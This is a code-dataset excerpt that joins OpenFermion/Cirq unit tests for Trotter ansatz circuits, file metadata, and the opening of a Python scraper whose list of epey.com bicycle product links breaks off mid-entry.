occupied_orbitals = range(len(qubits)//2)
preparation_circuit = cirq.Circuit(
prepare_gaussian_state(
qubits,
openfermion.QuadraticHamiltonian(one_body),
occupied_orbitals=occupied_orbitals
)
)
# Compute value using ansatz circuit and objective
circuit = cirq.resolve_parameters(
preparation_circuit + ansatz.circuit,
ansatz.param_resolver(ansatz.default_initial_params()))
result = circuit.final_wavefunction(
qubit_order=ansatz.qubit_permutation(qubits))
obj_val = objective.value(result)
# Compute value using study
study = VariationalStudy(
'study',
ansatz,
objective,
preparation_circuit=preparation_circuit)
study_val = study.value_of(ansatz.default_initial_params())
# Compute value by simulating time evolution
if isinstance(hamiltonian, openfermion.DiagonalCoulombHamiltonian):
half_way_hamiltonian = openfermion.DiagonalCoulombHamiltonian(
one_body=hamiltonian.one_body,
two_body=0.5 * hamiltonian.two_body)
elif isinstance(hamiltonian, openfermion.InteractionOperator):
half_way_hamiltonian = openfermion.InteractionOperator(
constant=hamiltonian.constant,
one_body_tensor=hamiltonian.one_body_tensor,
two_body_tensor=0.5 * hamiltonian.two_body_tensor)
simulation_circuit = cirq.Circuit(
simulate_trotter(
qubits,
half_way_hamiltonian,
time=ansatz.adiabatic_evolution_time,
n_steps=1,
order=order,
algorithm=trotter_algorithm)
)
final_state = (
preparation_circuit + simulation_circuit).final_wavefunction()
correct_val = openfermion.expectation(
objective._hamiltonian_linear_op, final_state).real
numpy.testing.assert_allclose(obj_val, study_val, atol=atol)
numpy.testing.assert_allclose(obj_val, correct_val, atol=atol)
@pytest.mark.parametrize(
'ansatz, trotter_algorithm, order, hamiltonian, atol', [
(SwapNetworkTrotterAnsatz(diag_coul_hamiltonian, iterations=2),
LINEAR_SWAP_NETWORK, 1, diag_coul_hamiltonian, 5e-5),
(SplitOperatorTrotterAnsatz(diag_coul_hamiltonian, iterations=2),
SPLIT_OPERATOR, 1, diag_coul_hamiltonian, 5e-5),
(LowRankTrotterAnsatz(h2_hamiltonian, iterations=2),
LOW_RANK, 0, h2_hamiltonian, 5e-5),
(LowRankTrotterAnsatz(lih_hamiltonian, iterations=2, final_rank=3),
LowRankTrotterAlgorithm(final_rank=3), 0, lih_hamiltonian, 1e-3),
(SwapNetworkTrotterHubbardAnsatz(2, 2, 1.0, 4.0, iterations=2),
LINEAR_SWAP_NETWORK, 1,
openfermion.get_diagonal_coulomb_hamiltonian(
openfermion.reorder(
openfermion.fermi_hubbard(2, 2, 1.0, 4.0),
openfermion.up_then_down)
),
5e-5)
])
def test_trotter_ansatzes_default_initial_params_iterations_2(
ansatz, trotter_algorithm, order, hamiltonian, atol):
"""Check that a Trotter ansatz with two iterations and default parameters
is consistent with time evolution with two Trotter steps."""
objective = HamiltonianObjective(hamiltonian)
qubits = ansatz.qubits
if isinstance(hamiltonian, openfermion.DiagonalCoulombHamiltonian):
one_body = hamiltonian.one_body
elif isinstance(hamiltonian, openfermion.InteractionOperator):
one_body = hamiltonian.one_body_tensor
if isinstance(ansatz, SwapNetworkTrotterHubbardAnsatz):
occupied_orbitals = (range(len(qubits)//4), range(len(qubits)//4))
else:
occupied_orbitals = range(len(qubits)//2)
preparation_circuit = cirq.Circuit(
prepare_gaussian_state(
qubits,
openfermion.QuadraticHamiltonian(one_body),
occupied_orbitals=occupied_orbitals
)
)
# Compute value using ansatz circuit and objective
circuit = cirq.resolve_parameters(
preparation_circuit + ansatz.circuit,
ansatz.param_resolver(ansatz.default_initial_params()))
result = circuit.final_wavefunction(
qubit_order=ansatz.qubit_permutation(qubits))
obj_val = objective.value(result)
# Compute value using study
study = VariationalStudy(
'study',
ansatz,
objective,
preparation_circuit=preparation_circuit)
study_val = study.value_of(ansatz.default_initial_params())
# Compute value by simulating time evolution
if isinstance(hamiltonian, openfermion.DiagonalCoulombHamiltonian):
quarter_way_hamiltonian = openfermion.DiagonalCoulombHamiltonian(
one_body=hamiltonian.one_body,
two_body=0.25 * hamiltonian.two_body)
three_quarters_way_hamiltonian = openfermion.DiagonalCoulombHamiltonian(
one_body=hamiltonian.one_body,
two_body=0.75 * hamiltonian.two_body)
elif isinstance(hamiltonian, openfermion.InteractionOperator):
quarter_way_hamiltonian = openfermion.InteractionOperator(
constant=hamiltonian.constant,
one_body_tensor=hamiltonian.one_body_tensor,
two_body_tensor=0.25 * hamiltonian.two_body_tensor)
three_quarters_way_hamiltonian = openfermion.InteractionOperator(
constant=hamiltonian.constant,
one_body_tensor=hamiltonian.one_body_tensor,
two_body_tensor=0.75 * hamiltonian.two_body_tensor)
simulation_circuit = cirq.Circuit(
simulate_trotter(
qubits,
quarter_way_hamiltonian,
time=0.5 * ansatz.adiabatic_evolution_time,
n_steps=1,
order=order,
algorithm=trotter_algorithm),
simulate_trotter(
qubits,
three_quarters_way_hamiltonian,
time=0.5 * ansatz.adiabatic_evolution_time,
n_steps=1,
order=order,
algorithm=trotter_algorithm)
)
final_state = (
preparation_circuit + simulation_circuit).final_wavefunction()
correct_val = openfermion.expectation(
objective._hamiltonian_linear_op, final_state).real
numpy.testing.assert_allclose(obj_val, study_val, atol=atol)
numpy.testing.assert_allclose(obj_val, correct_val, atol=atol)
| 40.514403 | 80 | 0.685729 | 1,040 | 9,845 | 6.247115 | 0.1875 | 0.023703 | 0.027705 | 0.022626 | 0.829614 | 0.813298 | 0.812683 | 0.812683 | 0.770817 | 0.754502 | 0 | 0.020698 | 0.234434 | 9,845 | 242 | 81 | 40.681818 | 0.841316 | 0.116912 | 0 | 0.679144 | 0 | 0 | 0.014903 | 0 | 0 | 0 | 0 | 0 | 0.02139 | 1 | 0.010695 | false | 0 | 0.032086 | 0 | 0.042781 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
0
| 6 |
86748acfd2e2d6f503ac8703ff17fb7002cb2fc1
| 252 |
py
|
Python
|
build/lib/Kronos_heureka_code/Zeit/__init__.py
|
heureka-code/Kronos-heureka-code
|
0ddbc93ec69f0bc50075071e6a3e406c9cc97737
|
[
"MIT"
] | null | null | null |
build/lib/Kronos_heureka_code/Zeit/__init__.py
|
heureka-code/Kronos-heureka-code
|
0ddbc93ec69f0bc50075071e6a3e406c9cc97737
|
[
"MIT"
] | null | null | null |
build/lib/Kronos_heureka_code/Zeit/__init__.py
|
heureka-code/Kronos-heureka-code
|
0ddbc93ec69f0bc50075071e6a3e406c9cc97737
|
[
"MIT"
] | null | null | null |
from Kronos_heureka_code.Zeit.Uhrzeit import Uhrzeit, Stunde, Minute, Sekunde
from Kronos_heureka_code.Zeit.Datum.Monat import Monate
from Kronos_heureka_code.Zeit.Datum.Jahr import Jahr, Zeitrechnung
from Kronos_heureka_code.Zeit.Datum.Tag import Tag
| 50.4 | 77 | 0.861111 | 39 | 252 | 5.358974 | 0.410256 | 0.191388 | 0.325359 | 0.401914 | 0.550239 | 0.430622 | 0 | 0 | 0 | 0 | 0 | 0 | 0.079365 | 252 | 4 | 78 | 63 | 0.900862 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 |
0
| 6 |
867722c3f684f02eb3e24dffeab626e5a7b8bb2c
| 19,936 |
py
|
Python
|
pycle/bicycle-scrapes/epey-scrape/downLink5.py
|
fusuyfusuy/School-Projects
|
8e38f19da90f63ac9c9ec91e550fc5aaab3d0234
|
[
"MIT"
] | null | null | null |
pycle/bicycle-scrapes/epey-scrape/downLink5.py
|
fusuyfusuy/School-Projects
|
8e38f19da90f63ac9c9ec91e550fc5aaab3d0234
|
[
"MIT"
] | null | null | null |
pycle/bicycle-scrapes/epey-scrape/downLink5.py
|
fusuyfusuy/School-Projects
|
8e38f19da90f63ac9c9ec91e550fc5aaab3d0234
|
[
"MIT"
] | null | null | null |
from bs4 import BeautifulSoup
import os
import wget
from urllib.request import Request, urlopen
bicycles=[{'name': 'Kron XC150 27.5 HD Bisiklet', 'link': 'https://www.epey.com/bisiklet/kron-xc150-27-5-hd.html'}, {'name': 'Corelli Trivor 3 Bisiklet', 'link': 'https://www.epey.com/bisiklet/corelli-trivor-3-0.html'}, {'name': 'Salcano Hector 26 V Bisiklet', 'link': 'https://www.epey.com/bisiklet/salcano-hector-26-v.html'}, {'name': 'Corelli Atrox 3.2 Bisiklet', 'link': 'https://www.epey.com/bisiklet/corelli-atrox-3-2.html'}, {'name': 'Mosso WildFire LTD HYD 27.5 Bisiklet', 'link': 'https://www.epey.com/bisiklet/mosso-wildfire-hyd-27-5.html'}, {'name': 'Corelli Via 1.2 Bisiklet', 'link': 'https://www.epey.com/bisiklet/corelli-via-1-2.html'}, {'name': 'Kron FD 1000 Bisiklet', 'link': 'https://www.epey.com/bisiklet/kron-fd-1000.html'}, {'name': 'Bisan CTS 5200 Bisiklet', 'link': 'https://www.epey.com/bisiklet/bisan-cts-5200.html'}, {'name': 'Kron XC100 26 MD Bisiklet', 'link': 'https://www.epey.com/bisiklet/kron-xc100-26-md.html'}, {'name': 'Bisan SPX-3250 Bisiklet', 'link': 'https://www.epey.com/bisiklet/bisan-spx-3250.html'}, {'name': 'Kron RC1000 Bisiklet', 'link': 'https://www.epey.com/bisiklet/kron-rc1000.html'}, {'name': 'Carraro E-Viva Bisiklet', 'link': 'https://www.epey.com/bisiklet/carraro-e-viva.html'}, {'name': 'Kron Ares 4.0 26 MD Bisiklet', 'link': 'https://www.epey.com/bisiklet/kron-ares-4-0-26-md.html'}, {'name': 'Carraro Monster 16 Bisiklet', 'link': 'https://www.epey.com/bisiklet/carraro-monster-16.html'}, {'name': 'Salcano Helen 26 Bisiklet', 'link': 'https://www.epey.com/bisiklet/salcano-helen-26.html'}, {'name': 'Bianchi RCX 527 Bisiklet', 'link': 'https://www.epey.com/bisiklet/bianchi-rcx-527-27-5.html'}, {'name': 'RKS TNT5 Bisiklet', 'link': 'https://www.epey.com/bisiklet/rks-tnt5.html'}, {'name': 'Corelli Via Lady 1.1 Bisiklet', 'link': 'https://www.epey.com/bisiklet/corelli-via-lady-1-1.html'}, {'name': 'Corelli Snoop 3.0 Bisiklet', 'link': 'https://www.epey.com/bisiklet/corelli-snoop-3-0.html'}, {'name': 'Corelli Dolce 2.0 Bisiklet', 'link': 'https://www.epey.com/bisiklet/corelli-dolce-2-0.html'}, {'name': 'Corelli Neon 2.1 Bisiklet', 'link': 'https://www.epey.com/bisiklet/corelli-neon-2-1.html'}, {'name': 'Kron CX100 Bisiklet', 'link': 'https://www.epey.com/bisiklet/kron-cx100-man.html'}, {'name': 'Bianchi Aspid 27 Bisiklet', 'link': 'https://www.epey.com/bisiklet/bianchi-aspid-27.html'}, {'name': 'Salcano İzmir Bisiklet', 'link': 'https://www.epey.com/bisiklet/salcano-izmir.html'}, {'name': 'Ümit 2610 Alanya Bisiklet', 'link': 'https://www.epey.com/bisiklet/umit-2610-alanya.html'}, {'name': 'Kross Trans 5.0 Bisiklet', 'link': 'https://www.epey.com/bisiklet/kross-trans-5-0.html'}, {'name': 'Kron ETX500 Bisiklet', 'link': 'https://www.epey.com/bisiklet/kron-etx500.html'}, {'name': 'Salcano Attack 14 Bisiklet', 'link': 'https://www.epey.com/bisiklet/salcano-attack-14.html'}, {'name': 'Corelli Banner Bisiklet', 'link': 'https://www.epey.com/bisiklet/corelli-banner.html'}, {'name': 'Corelli Voras 1.0 Bisiklet', 'link': 'https://www.epey.com/bisiklet/corelli-voras-1-0.html'}, {'name': 'Peugeot JM244 Bisiklet', 'link': 'https://www.epey.com/bisiklet/peugeot-jm244.html'}, {'name': 'Corelli Smile 20 Bisiklet', 'link': 'https://www.epey.com/bisiklet/corelli-smile-20.html'}, {'name': 'Carraro Buffalo 20 Bisiklet', 'link': 'https://www.epey.com/bisiklet/carraro-buffalo-20.html'}, {'name': 'Carraro Elite 804 Bisiklet', 'link': 'https://www.epey.com/bisiklet/carraro-elite-804.html'}, {'name': 'Ümit 1605 Little Pony Bisiklet', 'link': 'https://www.epey.com/bisiklet/umit-1605-little-pony.html'}, {'name': 'Ümit 2400 Colorado Bisiklet', 'link': 'https://www.epey.com/bisiklet/umit-2400-colorado.html'}, {'name': 'Kron CX50 26 V Bisiklet', 'link': 'https://www.epey.com/bisiklet/kron-cx50-26-v.html'}, {'name': 'Corelli Beauty 2.1 Bisiklet', 'link': 'https://www.epey.com/bisiklet/corelli-beauty-2-1.html'}, {'name': 'Corelli Snoop 2.2 Bisiklet', 'link': 'https://www.epey.com/bisiklet/corelli-snoop-2-2.html'}, {'name': 'Corelli Evol 2.0 Bisiklet', 'link': 'https://www.epey.com/bisiklet/corelli-evol-2-0.html'}, {'name': 'Salcano Excel 24 Lady Bisiklet', 'link': 'https://www.epey.com/bisiklet/salcano-excel-24-lady.html'}, {'name': 'Corelli Apenin 1.0 Bisiklet', 'link': 'https://www.epey.com/bisiklet/corelli-apenin-1-0.html'}, {'name': 'Orbis Voltage 26 Bisiklet', 'link': 'https://www.epey.com/bisiklet/orbis-voltage-26.html'}, {'name': 'Mosso Groovy 29 Bisiklet', 'link': 'https://www.epey.com/bisiklet/mosso-groovy-29.html'}, {'name': 'Bianchi Aspid 36 Bisiklet', 'link': 'https://www.epey.com/bisiklet/bianchi-aspid-36.html'}, {'name': 'Ümit 2864 Magnetic V Lady Bisiklet', 'link': 'https://www.epey.com/bisiklet/umit-2864-magnetic-v-lady.html'}, {'name': 'Cannondale F SI AL 3 27.5 Bisiklet', 'link': 'https://www.epey.com/bisiklet/cannondale-f-si-al-3-27-5.html'}, {'name': 'Salcano Bodrum 26 Man Bisiklet', 'link': 'https://www.epey.com/bisiklet/salcano-bodrum-26-man.html'}, {'name': 'Bianchi Energy D Bisiklet', 'link': 'https://www.epey.com/bisiklet/bianchi-energy-d-24.html'}, {'name': 'Ümit 2657 Albatros V Bisiklet', 'link': 'https://www.epey.com/bisiklet/umit-2657-albatros-v.html'}, {'name': 'Ümit 2012 Ben10 Bisiklet', 'link': 'https://www.epey.com/bisiklet/umit-2012-ben10.html'}, {'name': 'Ümit 2002 Z-Trend Bisiklet', 'link': 'https://www.epey.com/bisiklet/umit-2002-z-trend.html'}, {'name': 'Mosso 29 WildFire LTD V Bisiklet', 'link': 'https://www.epey.com/bisiklet/mosso-29-wildfire-ltd-v.html'}, {'name': 'Salcano 300 20 MD Bisiklet', 'link': 'https://www.epey.com/bisiklet/salcano-300-20-md.html'}, {'name': 'Salcano City Wind Lady HD Bisiklet', 'link': 'https://www.epey.com/bisiklet/salcano-city-wind-lady-hd.html'}, {'name': 'Salcano NG444 27.5 HD Bisiklet', 'link': 'https://www.epey.com/bisiklet/salcano-ng444-27-5-hd.html'}, {'name': 'Carraro Daytona 927 Bisiklet', 'link': 'https://www.epey.com/bisiklet/carraro-daytona-927.html'}, {'name': 'Kron FD2100 Bisiklet', 'link': 'https://www.epey.com/bisiklet/kron-fd2100.html'}, {'name': 'Kron WRC1000 Bisiklet', 'link': 'https://www.epey.com/bisiklet/kron-wrc1000.html'}, {'name': 'Vortex 5.0 27.5 Bisiklet', 'link': 'https://www.epey.com/bisiklet/vortex-5-0-27-5.html'}, {'name': 'Kron XC75L 20 Bisiklet', 'link': 'https://www.epey.com/bisiklet/kron-xc75l-20.html'}, {'name': 'Kron Vortex 4.0 26 V Bisiklet', 'link': 'https://www.epey.com/bisiklet/kron-vortex-4-0-26-v.html'}, {'name': 'Kron Anthea 3.0 20 Bisiklet', 'link': 'https://www.epey.com/bisiklet/kron-anthea-3-0-20.html'}, {'name': 'Peugeot T16-28 Bisiklet', 'link': 'https://www.epey.com/bisiklet/peugeot-t16-28.html'}, {'name': 'Peugeot M15-26 Bisiklet', 'link': 'https://www.epey.com/bisiklet/peugeot-m15-26.html'}, {'name': 'Daafu SXC 100 20 Bisiklet', 'link': 'https://www.epey.com/bisiklet/daafu-sxc-100-20.html'}, {'name': 'Corelli Kickboy 20 Bisiklet', 'link': 'https://www.epey.com/bisiklet/corelli-kickboy-20.html'}, {'name': 'Peugeot F13 Bisiklet', 'link': 'https://www.epey.com/bisiklet/peugeot-f13.html'}, {'name': 'Carraro Elite 805 Bisiklet', 'link': 'https://www.epey.com/bisiklet/carraro-elite-805.html'}, {'name': 'Carraro Force 920 Bisiklet', 'link': 'https://www.epey.com/bisiklet/carraro-force-920.html'}, {'name': 'Berg Jeep Adventure Bisiklet', 'link': 'https://www.epey.com/bisiklet/berg-jeep-adventure.html'}, {'name': 'Berg Buddy Orange Bisiklet', 'link': 'https://www.epey.com/bisiklet/berg-buddy-orange.html'}, {'name': 'Ümit 2019 Picolo Bisiklet', 'link': 'https://www.epey.com/bisiklet/umit-2019-picolo.html'}, {'name': 'Ümit 2833 Ventura Lady Bisiklet', 'link': 'https://www.epey.com/bisiklet/umit-2833-ventura-lady.html'}, {'name': 'Ümit 2668 Faster V Bisiklet', 'link': 'https://www.epey.com/bisiklet/umit-2668-faster-v.html'}, {'name': 'Ümit 2960 Camaro HYD Bisiklet', 'link': 'https://www.epey.com/bisiklet/umit-2960-camaro-hyd.html'}, {'name': 'Kron RF100 24 V Bisiklet', 'link': 'https://www.epey.com/bisiklet/kron-rf100-24-v.html'}, {'name': 'Sedona 240 Bisiklet', 'link': 'https://www.epey.com/bisiklet/sedona-240.html'}, {'name': 'Corelli Carmen 1.0 Bisiklet', 'link': 'https://www.epey.com/bisiklet/corelli-carmen-1-0.html'}, {'name': 'Corelli Swing 2.0 Bisiklet', 'link': 'https://www.epey.com/bisiklet/corelli-swing-2-0.html'}, {'name': 'Corelli Teton 2.2 Bisiklet', 'link': 'https://www.epey.com/bisiklet/corelli-teton-2-2.html'}, {'name': 'Bianchi Buffalo 24 Bisiklet', 'link': 'https://www.epey.com/bisiklet/bianchi-buffalo-24.html'}, {'name': 'Carraro Juliana 26 Bisiklet', 'link': 'https://www.epey.com/bisiklet/carraro-juliana-26.html'}, {'name': 'Ghost Kato 5.7 AL Bisiklet', 'link': 'https://www.epey.com/bisiklet/ghost-kato-5-7-al.html'}, {'name': 'Bianchi Intenso Potenza Bisiklet', 'link': 'https://www.epey.com/bisiklet/bianchi-intenso-potenza.html'}, {'name': 'Salcano İmpetus 29 Deore Bisiklet', 'link': 'https://www.epey.com/bisiklet/salcano-impetus-29-deore.html'}, {'name': 'Salcano NG400 27.5 Lady HD Bisiklet', 'link': 'https://www.epey.com/bisiklet/salcano-ng400-27-5-lady-hd.html'}, {'name': 'Salcano NG750 26 Lady HD Bisiklet', 'link': 'https://www.epey.com/bisiklet/salcano-ng750-26-lady-hd.html'}, {'name': 'Salcano NG800 24 Lady V Bisiklet', 'link': 'https://www.epey.com/bisiklet/salcano-ng800-24-lady-v.html'}, {'name': 'Salcano Lion FS Bisiklet', 'link': 'https://www.epey.com/bisiklet/salcano-lion-fs.html'}, {'name': 'Salcano City Fun 50 Lady HD Bisiklet', 'link': 'https://www.epey.com/bisiklet/salcano-city-fun-50-lady-hd.html'}, {'name': 'Salcano Marmaris Bisiklet', 'link': 'https://www.epey.com/bisiklet/salcano-marmaris.html'}, {'name': 'Salcano NG 800 26 V Bisiklet', 'link': 'https://www.epey.com/bisiklet/salcano-ng-800-26-v.html'}, {'name': 'Corelli Terra 1.0 Bisiklet', 'link': 'https://www.epey.com/bisiklet/corelli-terra-1-0.html'}, {'name': 'Corelli Adonis 2.2 Bisiklet', 'link': 'https://www.epey.com/bisiklet/corelli-adonis-2-2.html'}, {'name': 'Corelli Jazz 1.2 Bisiklet', 'link': 'https://www.epey.com/bisiklet/corelli-jazz-1-2.html'}, {'name': 'Corelli Cyborg 2.0 Bisiklet', 'link': 'https://www.epey.com/bisiklet/corelli-cyborg-2-0.html'}, {'name': 'Corelli Scopri 2.0 Bisiklet', 'link': 'https://www.epey.com/bisiklet/corelli-scopri-2-0.html'}, {'name': 'Orbis Punkrose 24 Bisiklet', 'link': 'https://www.epey.com/bisiklet/orbis-punkrose-24.html'}, {'name': 'Orbis Tweety 16 Bisiklet', 'link': 'https://www.epey.com/bisiklet/orbis-tweety-16.html'}, {'name': 'Orbis Crazy 20 Bisiklet', 'link': 'https://www.epey.com/bisiklet/orbis-crazy-20.html'}, {'name': 'Orbis Cloud 20 Bisiklet', 'link': 'https://www.epey.com/bisiklet/orbis-cloud-20.html'}, {'name': 'Orbis Dynamic 24 Bisiklet', 'link': 'https://www.epey.com/bisiklet/orbis-dynamic-24.html'}, {'name': 'Orbis Escape 24 Bisiklet', 'link': 'https://www.epey.com/bisiklet/orbis-escape-24.html'}, {'name': 'Tern Verge S27H Bisiklet', 'link': 'https://www.epey.com/bisiklet/tern-verge-s27h.html'}, {'name': 'Dahon Briza D8 Bisiklet', 'link': 'https://www.epey.com/bisiklet/dahon-briza-d8.html'}, {'name': 'Kron XC100 24 V Bisiklet', 'link': 'https://www.epey.com/bisiklet/kron-xc100-24-man-v.html'}, {'name': 'Kron TX150L Lady V Bisiklet', 'link': 'https://www.epey.com/bisiklet/kron-tx150-lady-v.html'}, {'name': 'Kron XC450 27.5 HD Bisiklet', 'link': 'https://www.epey.com/bisiklet/kron-xc450-27-5-man-hd.html'}, {'name': 'Whistle Guipago 1830 Bisiklet', 'link': 'https://www.epey.com/bisiklet/whistle-guipago-1830.html'}, {'name': 'Mosso 20 WildFire V Boys Bisiklet', 'link': 'https://www.epey.com/bisiklet/mosso-20-wildfire-v-boys.html'}, {'name': 'Mosso City Life Nexus Man Bisiklet', 'link': 'https://www.epey.com/bisiklet/mosso-city-life-nexus-man.html'}, {'name': 'Mosso 771TB3 DMD Acera Bisiklet', 'link': 'https://www.epey.com/bisiklet/mosso-771tb3-dmd-acera.html'}, {'name': 'Mosso 735TCA 105 Bisiklet', 'link': 'https://www.epey.com/bisiklet/mosso-735tca-105.html'}, {'name': 'Mosso Groovy 27.5 Bisiklet', 'link': 'https://www.epey.com/bisiklet/mosso-groovy-27-5.html'}, {'name': 'Ghost Kato 4 Kid 24 Bisiklet', 'link': 'https://www.epey.com/bisiklet/ghost-kato-4-kid-24.html'}, {'name': 'Ghost Kato 2 Kid 20 Bisiklet', 'link': 'https://www.epey.com/bisiklet/ghost-kato-2-kid-20.html'}, {'name': 'Ghost Lawu 2 26 Bisiklet', 'link': 'https://www.epey.com/bisiklet/ghost-lawu-2-26.html'}, {'name': 'Carraro Daytona 2924 Bisiklet', 'link': 'https://www.epey.com/bisiklet/carraro-daytona-2924.html'}, {'name': 'Carraro Flexi 103 Bisiklet', 'link': 'https://www.epey.com/bisiklet/carraro-flexi-103.html'}, {'name': 'Carraro Süngerbob 20 Bisiklet', 'link': 'https://www.epey.com/bisiklet/carraro-sungerbob-20.html'}, {'name': 'Bianchi Bella 24 Bisiklet', 'link': 'https://www.epey.com/bisiklet/bianchi-bella-24.html'}, {'name': 'Bianchi RCX 237 Bisiklet', 'link': 'https://www.epey.com/bisiklet/bianchi-rcx-237.html'}, {'name': 'Bianchi Touring 411 Bisiklet', 'link': 'https://www.epey.com/bisiklet/bianchi-touring-411.html'}, {'name': 'Salcano Sarajevo 26 Lady Bisiklet', 'link': 'https://www.epey.com/bisiklet/salcano-sarajevo-26-lady.html'}, {'name': 'Salcano NG450 26 Lady HD Bisiklet', 'link': 'https://www.epey.com/bisiklet/salcano-ng450-26-lady-hd.html'}, {'name': 'Salcano City Sport 40 V Bisiklet', 'link': 'https://www.epey.com/bisiklet/salcano-city-sport-40-v.html'}, {'name': 'Ümit 2049 Monster High Bisiklet', 'link': 'https://www.epey.com/bisiklet/umit-2049-monster-high.html'}, {'name': 'Cube Reaction GTC Race 27.5 Bisiklet', 'link': 'https://www.epey.com/bisiklet/cube-reaction-gtc-race-27-5.html'}, {'name': 'Arbike 2901 Bisiklet', 'link': 'https://www.epey.com/bisiklet/arbike-2901.html'}, {'name': 'Arbike 2606 26 inç Bisiklet', 'link': 'https://www.epey.com/bisiklet/arbike-2606.html'}, {'name': 'Salcano NG350 29 HD Bisiklet', 'link': 'https://www.epey.com/bisiklet/salcano-ng350-hd-29.html'}, {'name': 'Salcano NG750 24 Lady V Bisiklet', 'link': 'https://www.epey.com/bisiklet/salcano-ng750-lady-24.html'}, {'name': 'Cube Delhi Pro Bisiklet', 'link': 'https://www.epey.com/bisiklet/cube-delhi-pro.html'}, {'name': 'Cube Attain Race Bisiklet', 'link': 'https://www.epey.com/bisiklet/cube-attain-race.html'}, {'name': 'Cube Attain GTC SL Disk Bisiklet', 'link': 'https://www.epey.com/bisiklet/cube-attain-gtc-sl-disk.html'}, {'name': 'Cube Acid 27.5 Bisiklet', 'link': 'https://www.epey.com/bisiklet/cube-acid-27-5.html'}, {'name': 'Cube Agree C:62 SL Bisiklet', 'link': 'https://www.epey.com/bisiklet/cube-agree-c62-sl.html'}, {'name': 'Merida BIG.NINE XT Edition 29 Bisiklet', 'link': 'https://www.epey.com/bisiklet/merida-big-nine-xt-edition-29.html'}, {'name': 'Merida BIG.SEVEN 1000 27.5 Bisiklet', 'link': 'https://www.epey.com/bisiklet/merida-big-seven-1000-27-5.html'}, {'name': 'Trek Superfly 5 29 Bisiklet', 'link': 'https://www.epey.com/bisiklet/trek-superfly-5-29.html'}, {'name': 'Geotech Manic Carbon 29 Bisiklet', 'link': 'https://www.epey.com/bisiklet/geotech-manic-carbon-29.html'}, {'name': 'Corratec Superbow Fun 29ER 29 Bisiklet', 'link': 'https://www.epey.com/bisiklet/corratec-superbow-fun-29er-29.html'}, {'name': 'Corratec Dolomiti Sora 28 Bisiklet', 'link': 'https://www.epey.com/bisiklet/corratec-dolomiti-sora-28.html'}, {'name': 'Cannondale Supersix Evo Ultegra Bisiklet', 'link': 'https://www.epey.com/bisiklet/cannondale-supersix-evo-ultegra-4-28.html'}, {'name': 'Cannondale Bad Boy 4 28 Bisiklet', 'link': 'https://www.epey.com/bisiklet/cannondale-bad-boy-4-28.html'}, {'name': 'Cannondale Trail Womens 5 27.5 Bisiklet', 'link': 'https://www.epey.com/bisiklet/cannondale-trail-womens-5-27-5.html'}, {'name': 'Schwinn Searcher 3 Men 28 Bisiklet', 'link': 'https://www.epey.com/bisiklet/schwinn-searcher-3-men-28.html'}, {'name': 'Geotech Path XC 4.4 20. Yil özel Seri 26 Bisiklet', 'link': 'https://www.epey.com/bisiklet/geotech-path-xc-4-4-20-yil-ozel-seri-26.html'}, {'name': 'Kron XC250 Lady 26 Bisiklet', 'link': 'https://www.epey.com/bisiklet/kron-xc250-lady-26.html'}, {'name': 'Kron TX150 HD Bisiklet', 'link': 'https://www.epey.com/bisiklet/kron-tx150-hd.html'}, {'name': 'Salcano Igman 27.5 Deore Bisiklet', 'link': 'https://www.epey.com/bisiklet/salcano-igman-deore-27-5.html'}, {'name': 'Salcano Astro 29 V Bisiklet', 'link': 'https://www.epey.com/bisiklet/salcano-astro-v-29.html'}, {'name': 'Salcano City Wings 20 HD Bisiklet', 'link': 'https://www.epey.com/bisiklet/salcano-city-wings-20-hd.html'}, {'name': 'Salcano XRS050 Claris Bisiklet', 'link': 'https://www.epey.com/bisiklet/salcano-xrs050-claris.html'}, {'name': 'Salcano Tracker 20 Bisiklet', 'link': 'https://www.epey.com/bisiklet/salcano-tracker-20.html'}, {'name': 'Salcano Cappadocia Steel Bisiklet', 'link': 'https://www.epey.com/bisiklet/salcano-cappadocia-steel.html'}, {'name': 'Salcano Assos 20 29 X1 Bisiklet', 'link': 'https://www.epey.com/bisiklet/salcano-assos-20-x1-29.html'}, {'name': 'Salcano Assos 10 29 X1 Bisiklet', 'link': 'https://www.epey.com/bisiklet/salcano-assos-10-x1-29.html'}, {'name': 'Scott Contessa 640 Bisiklet', 'link': 'https://www.epey.com/bisiklet/scott-contessa-640-26.html'}, {'name': 'Tern Link B7 Bisiklet', 'link': 'https://www.epey.com/bisiklet/tern-link-b7-20.html'}, {'name': 'Bianchi Honey Bisiklet', 'link': 'https://www.epey.com/bisiklet/bianchi-honey-16.html'}, {'name': 'Bianchi Touring 405 Bisiklet', 'link': 'https://www.epey.com/bisiklet/bianchi-touring-405-bayan-28.html'}, {'name': 'Bianchi AFX 7029 29 Bisiklet', 'link': 'https://www.epey.com/bisiklet/bianchi-afx-7029-29.html'}, {'name': 'Bianchi RCX 426 Bisiklet', 'link': 'https://www.epey.com/bisiklet/bianchi-rcx-426-26.html'}, {'name': 'Bianchi Nitro Bisiklet', 'link': 'https://www.epey.com/bisiklet/bianchi-nitro-24.html'}, {'name': 'Carraro Sportive 327 Bisiklet', 'link': 'https://www.epey.com/bisiklet/carraro-sportive-327-28.html'}, {'name': 'Carraro Street 26 Bisiklet', 'link': 'https://www.epey.com/bisiklet/carraro-street-26.html'}, {'name': 'Carraro Big 629 Bisiklet', 'link': 'https://www.epey.com/bisiklet/carraro-big-629-29.html'}, {'name': 'Carraro Crs 620 26 Bisiklet', 'link': 'https://www.epey.com/bisiklet/carraro-crs-620-26.html'}, {'name': 'Sedona Black Code 8 27.5 Bisiklet', 'link': 'https://www.epey.com/bisiklet/sedona-black-code-8-27-5.html'}, {'name': 'Coranna 2491 Castor Bisiklet', 'link': 'https://www.epey.com/bisiklet/coranna-2491-castor.html'}, {'name': "Ümit 2842 City's Bisiklet", 'link': 'https://www.epey.com/bisiklet/umit-2842-citys-2842-citys.html'}, {'name': 'Ümit 2411 Rideon Bisiklet', 'link': 